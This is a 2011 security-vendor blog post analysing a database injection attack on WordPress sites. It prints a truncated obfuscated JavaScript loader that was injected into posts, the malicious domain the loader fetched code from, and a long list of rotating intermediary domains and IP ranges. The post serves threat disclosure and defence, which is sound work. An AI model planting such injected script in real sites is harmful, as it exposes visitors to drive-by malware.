• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Database injection, lessthenaminutehandle.com and more updates

April 1, 2011David Dede

FacebookTwitterSubscribe

We posted a few weeks ago about a large scale database injection attack affecting WordPress on shared hosts. The infected sites got the following javascript malware inserted on every post of their database (generally the wp-post table on WordPress):

<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72..
70%3F%6B%6B%3D%33%33%22%3E%3C%2F%73%63%72%69%70%74%3E%27%29%3B"..

Which after decoded, attempted to include and load the following link: lessthenaminutehandle.com/js.php?kk=33

We also saw multiple variations of it, where the following domains where used as the main intermediaries:

http://lessthenaseconddeal.com/ll.php?k=09
globalpoweringgathering.com
lessthenaminutehandle.com
lessthenaseconddeal.com
welcometotheglobalisnet.com

What is interesting is the number of sub-intermediaries that change every few hours:

antivir1.mooo.com
antivirus-3654.co.cc
aqfwbngy.co.cc
defender-dyxa.co.cc
defender-kwwh.in
defender-wqga.in
defender-wtln.co.cc
pfoencut.co.cc
software-wujy.co.cc
system-scanner-ryes.co.cc
system-scanner-uemo.co.cc
system-scanner-uotu.co.cc
zgfozmcr.co.cc
antivirus-microsoft-corporation.com
www3.aboutavsoft.com
www3.first-guardul.cz.cc
www3.first-security-checker.com
www3.incredible-protectionro.rr.nu
www3.netprotectionsoftre.com
www3.powerkbsentinel.rr.nu
www3.powernhgmdftkcleaner.myfw.us
www3.save-internet-foru.com
www3.simpleclean-foru.net
www3.smart-security-holder.in
www3.smartsuite-4u.in
www3.smartsystemscanro.myfw.us
www3.specialprotectionti.rr.nu
www3.strongcheckera.rr.nu
www3.top-network-guard.in
www3.top-scan-foru.in
www3.topsuitesentinel.rr.nu
www4.avguardianpp.myfw.us
www4.avguardianst.myfw.us
www4.bestuhzscanner.rr.nu
www4.first-internetmaster.net
www4.foryou-cleanhard.rr.nu
www4.goodghtsafe.rr.nu
www4.seeeresafe.in
www4.seefredsafe.in
www4.smartinternet-foryou.net
www4.strong-oppinternet.in
www4.thebestcheckernar.myfw.us
www4.top-only-scanner.uni.cc

They are using domains on multiple TLDs (.net, .com, .in, .us, etc) and changing every hour. The most common network for these to be hosted are at: 65.23.153.0/24 and 46.252.130.0/24, but that changes often as well. We will keep you posted as we track them…

If you are worried your site might be vulneable, scan it here: http://sitecheck.sucuri.net


If your site is infected with malware or blacklisted, we are here to help.

FacebookTwitterSubscribe

Categories: Website Malware InfectionsTags: Hacked Websites, Malware Updates, Website Blacklist

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.